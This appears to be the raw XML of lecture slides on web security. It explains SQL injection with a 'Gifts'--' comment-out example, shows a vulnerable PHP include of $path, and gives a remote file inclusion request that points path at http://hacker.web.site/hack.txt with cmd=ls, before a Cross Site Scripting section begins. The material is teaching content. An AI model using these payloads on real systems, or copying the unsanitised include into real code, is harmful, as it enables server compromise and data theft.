          <p:cNvPr id="7" name="object 7"/>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8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="2071703"/>
            <a:ext cx="8867775" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.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24147" y="1006855"/>
            <a:ext cx="2609850" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8840216" y="6871969"/>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14</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2286000"/>
            <a:ext cx="8839200" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>SQL injection examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are a wide variety of SQL injection vulnerabilities, attacks, and techniques, which arise in different situations. Some common SQL injection examples include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Retrieving hidden data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where you can modify an SQL query to return additional results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Subverting application logic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where you can change a query to interfere with the application's logic.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>UNION attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where you can retrieve data from different database tables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Examining the database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where you can extract information about the version and structure of the database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6633"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Blind SQL injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333332"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where the results of a query you control are not returned in the application's responses.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333332"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="6293715"/>
            <a:ext cx="4911986" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://portswigger.net/web-security/sql-injection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63295" y="463295"/>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24147" y="1006855"/>
            <a:ext cx="2609850" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0" smtClean="0"/>
              <a:t>SQLi Example</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8840216" y="6871969"/>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14</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622300" y="6435181"/>
            <a:ext cx="4911986" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://portswigger.net/web-security/sql-injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622300" y="2031490"/>
            <a:ext cx="8984995" cy="4555093"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>https://insecure-website.com/products?category=Gifts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>This causes the application to make an SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t>query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>SELECT * FROM products WHERE category = 'Gifts' AND released = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0"/>
              <a:t> ---</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>https://insecure-website.com/products?category=Gifts'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>This results in the SQL query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>The double dash makes the remainder of the query a comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117916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63295" y="463295"/>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24147" y="1006855"/>
            <a:ext cx="2609850" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0" smtClean="0"/>
              <a:t>SQLi Example</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8840216" y="6871969"/>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14</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622300" y="6435181"/>
            <a:ext cx="4911986" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://portswigger.net/web-security/sql-injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="2095880"/>
            <a:ext cx="8610600" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 2" descr="SQL injec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4" descr="SQL injec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72907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24147" y="1006855"/>
            <a:ext cx="2609850" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-5" dirty="0" smtClean="0"/>
              <a:t>SQLi</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221739" y="1987550"/>
            <a:ext cx="7297420" cy="2586990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104140" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="820"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Further </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variant on injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacks</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Input includes code that is then</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>executed</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see PHP remote code injection</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-160" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="585"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>variable </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>global field variables </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>remote</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="660"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>this type of attack is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>widely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-120" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploited</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8840216" y="6871969"/>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14</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918952" y="5055089"/>
            <a:ext cx="8135620" cy="771525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="27470">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="67945" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="105410">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" spc="-10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="1450" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="105410" marR="4384675">
              <a:lnSpc>
                <a:spcPts val="1590"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>include $path . 'functions.php';  include $path .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-50" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>'data/prefs.php';</a:t>
            </a:r>
            <a:endParaRPr sz="1450" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918952" y="6064739"/>
            <a:ext cx="8135620" cy="367665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="9ACCFF"/>
          </a:solidFill>
          <a:ln w="27470">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="67945" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="105410">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="535"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="10" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/calendar/embed/day</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1450" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>.php?path=http://hacker.web.site/hack.txt?&amp;cmd=ls</a:t>
            </a:r>
            <a:endParaRPr sz="1450">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9012746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01138" y="1006855"/>
            <a:ext cx="6566662" cy="566822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Cross Site Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-75" dirty="0" smtClean="0"/>
              <a:t>(XSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr spc="-5" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
